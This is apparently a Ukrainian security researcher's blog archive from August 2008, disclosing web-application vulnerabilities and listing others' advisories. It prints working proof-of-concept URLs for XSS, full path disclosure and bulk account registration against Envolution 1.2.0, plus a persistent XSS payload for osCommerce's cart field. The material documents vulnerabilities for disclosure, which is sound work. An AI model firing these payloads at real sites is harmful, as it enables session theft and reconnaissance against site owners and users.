Архів для категорії 'Уразливості'

Добірка уразливостей

17:31 23.08.2008

В даній добірці уразливості в веб додатках:

  • Moonware Software Multiple Vulnerabilities (деталі)
  • Abledesign Dynamic Picture Frame XSS (деталі)
  • InterWorx-CP Multiple HTML Injections Vulnerabilitie (деталі)
  • Sunshop v4.0 <= Blind SQL Injection exploit (деталі)
  • SQL-ін’єкція в ActiveKB v1.5 (деталі)
  • DVD Rental System multiple XSS and CSRF vulnerabilities (деталі)
  • Gallery In A Box Username & Password Parameters SQL Injection (деталі)
  • Next Gen Portfolio Manager SQL Injection (деталі)
  • la-nai cms_v1.2.14 - Remote SQL Injection (деталі)
  • PHP remote file inclusion vulnerability in Jupiter CMS 1.1.5 (деталі)

Уразливість в osCommerce

20:28 22.08.2008

03.07.2008

У листопаді, 02.11.2007, я знайшов Cross-Site Scripting (причому persistent) в системі osCommerce. Як раз коли виявив уразливість на bezpeka-shop.com, де і використовується цей движок.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.08.2008

XSS:

POST запит на сторінці http://site/shopping_cart.php
<script>alert(document.cookie)</script>В полі Количество.

Після ін’єкції коду, він спрацьовує на кожній сторінці сайта (persistent XSS).

Добірка уразливостей

17:24 21.08.2008

В даній добірці уразливості в веб додатках:

  • PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability (0dd exploit) (деталі)
  • eXV2.de Browser Cookie is not properly sanitised (деталі)
  • JobLister3 SQL injection vulnerabilities (деталі)
  • Neuron Blog Admin Permission Bypass and Remote File Upload Vulnerability (деталі)
  • PHPCentral Poll Script Remote Command Execution Vulnerability (деталі)
  • PHPCentral Login Script Remote Command Execution Vulnerability (деталі)
  • eyeOS checksum prediction (деталі)
  • PhpGedView login page multiple XSS (деталі)
  • ePersonnel_RC_2004 Remote File Bug (деталі)
  • Directory traversal vulnerability in Jupiter CMS 1.1.5 (деталі)

Уразливість на www.myvi.ru

21:32 20.08.2008

15.03.2008

У серпні, 24.08.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.myvi.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

20.08.2008

XSS:

Дана уразливість вже виправлена.

Нові уразливості в Envolution

23:56 19.08.2008

Нещодавно, 17.08.2008, після попередніх уразливостей в Envolution, я знайшов нові Full path disclosure та Cross-Site Scripting уразливості в системі Envolution. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Full path disclosure:

http://site/user.php?module=%22
http://site/user.php?uname=%22
http://site/user.php?upass=%22
http://site/user.php?upassverif=%22
http://site/user.php?email=%22
http://site/user.php?name=%22
http://site/user.php?url=%22
http://site/user.php?timezoneoffset=%22
http://site/user.php?user_avatar=%22
http://site/user.php?user_icq=%22
http://site/user.php?user_aim=%22
http://site/user.php?user_yyim=%22
http://site/user.php?user_msnm=%22
http://site/user.php?user_from=%22
http://site/user.php?user_occ=%22
http://site/user.php?user_intrest=%22
http://site/user.php?user_sig=%22
http://site/user.php?bio=%22
http://site/user.php?agreetoterms=%22
http://site/user.php?femail=%22
http://site/user.php?user_viewemail=%22

XSS:

http://site/print.php?sid=0%2f%2a%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразлива версія Envolution 1.2.0 та попередні версії.

Сайт hip.org.ua інфікований

20:12 19.08.2008

Мені періодично доводиться зіштовхуватися з інфікованими сайтами в Інтернеті, в тому числі й в Уанеті. Взломи сайтів з метою розміщення на них шкідливих кодів стають все більш поширеними з кожним роком. Зазначу, що в своїй статті про стан зараженості Уанета, я приводив дані про стан зараженості Уанета в попередні роки та зпрогнозував стан на 2008 рік.

Раніше я писав про інфікований сайт dn.kiev.ua. Даний сайт був інфіковавний тривалий час - після виявлення мною шкідливого коду на сайті й повідомлення адмінам, довгий час вони не прибирали шкідливий код (проігнорувавши моє попередження і продовжуючи заражати шкідливим кодом відвідувачів сайта). Лише нещодавно вони врешті решт видалили шкідливий код з сайта.

Зараз розповім про ще один заражений сайт. Нещодавно, 17.08.2008, використовуючи Гугл, я виявив, що сайт hip.org.ua інфікований. Раніше мені доводилося чути про цей сайт, і під час пошуку в Гуглі він мені траплявся, але раніше він не був інфікований. Зараз же Google заявив, що “Ця сторінка може заподіяти шкоду вашому комп’ютерові”. Звісно Гугл може й помилятися з такими ярликами, але частіше все ж таки вони вірно відмічають інфіковані сайти.

Після того, як я сам перевірив “Персональний блог Hip” http://hip.org.ua, я впевнився, що він інфікований. На даному сайті розміщений шкідливий іфрейм, що містить велику кількість експлоітів (в зашифрованому вигляді). До речі, іфрейм веде на сторінку з експлоітами, що розміщена на сайті, що має китайський хостинг (причому Пекінський). Схоже, що блог Hip’а взломали з приводу Олімпіади :-) .

Адміну hip.org.ua варто витерти шкідливий код зі свого сайта і почати серйозно слідкувати за безпекою власного сайта. Це варто робити всім блогерам, як і власникам будь-яких сайтів.

Добірка уразливостей

16:29 19.08.2008

В даній добірці уразливості в веб додатках:

  • phpCoupon Vulnerabilities (деталі)
  • PHPBlogger cookie privilege escalation (деталі)
  • Information Leakage in PHPBlogger (деталі)
  • Message Board / Threaded Discussion Forum SQL INJECTION (деталі)
  • Pay Roll - Time Sheet and Punch Card Application With Web Interface SQL Injection (деталі)
  • Real Estate listing website application template SQL Injection (деталі)
  • WebStore - Online Store Application Template SQL INJECTION (деталі)
  • Berthanas Ziyaretci Defteri v2.0 (tr) Sql (деталі)
  • DeskPRO Admin Panel Multiple HTML Injections (деталі)
  • Jupiter CMS 1.1.5 (Client-IP) Remote SQL Injection Exploit (деталі)

Численні уразливості в Envolution

23:53 18.08.2008

Нещодавно, 16.08.2008, після попередніх уразливостей в Envolution, я знайшов нові численні уразливості в системі Envolution, зокрема Insufficient Anti-automation та Cross-Site Scripting. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Insuficient Anti-automation:

Уразливість в user.php (в модулі NS-NewUser).

Envolution Insufficient Anti-automation.html

Можна як через POST, так і через GET:

http://site/user.php?uname=test&upass=12345&upassverif=12345&email=test@test.com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

Уразливості в user.php (в модулі NS-NewUser).

http://site/user.php?uname=test&upass=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&upassverif=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&email=test@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&timezoneoffset=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_avatar=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_icq=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_aim=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_msnm=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_occ=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_intrest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_sig=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&bio=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&agreetoterms=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразлива версія Envolution 1.2.0 та попередні версії.

Уразливості на www.stat24.com.ua

20:13 18.08.2008

18.03.2008

У серпні, 24.08.2007, а також додатково сьогодні, я знайшов Full path disclosure та Cross-Site Scripting уразливості на проекті http://www.stat24.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

18.08.2008

Full path disclosure:

http://www.stat24.com.ua/ua/ranking/frazpc.pl

Дана уразливість вже виправлена (але вона все ще зафіксована в кеші Гугла).

XSS:

Уразливості виявив на доменах http://www.stat24.com.ua і http://www.stat24.ru.

Дані уразливості вже виправлені, але виправлені не повністю, тому при невеличкій модифікації одна XSS знову працює ;-) (на обох доменах).

XSS:

http://www.stat24.com.ua

http://www.stat24.ru

Наведені приклади XSS для Mozilla і Firefox. Для IE можуть бути зроблені аналогічні коди.

Уразливості в Envolution

23:55 16.08.2008

Сьогодні я знайшов Cross-Site Scripting та Full path disclosure уразливості в системі Envolution. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

XSS:

Уразливість в user.php (в модулі NS-NewUser) в параметрі op.

http://site/user.php?module=NS-NewUser&op=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/user.php?module=NS-NewUser&op=%3Cscript%3E

або

http://site/user.php?op=%22

Уразлива версія Envolution 1.2.0 та попередні версії.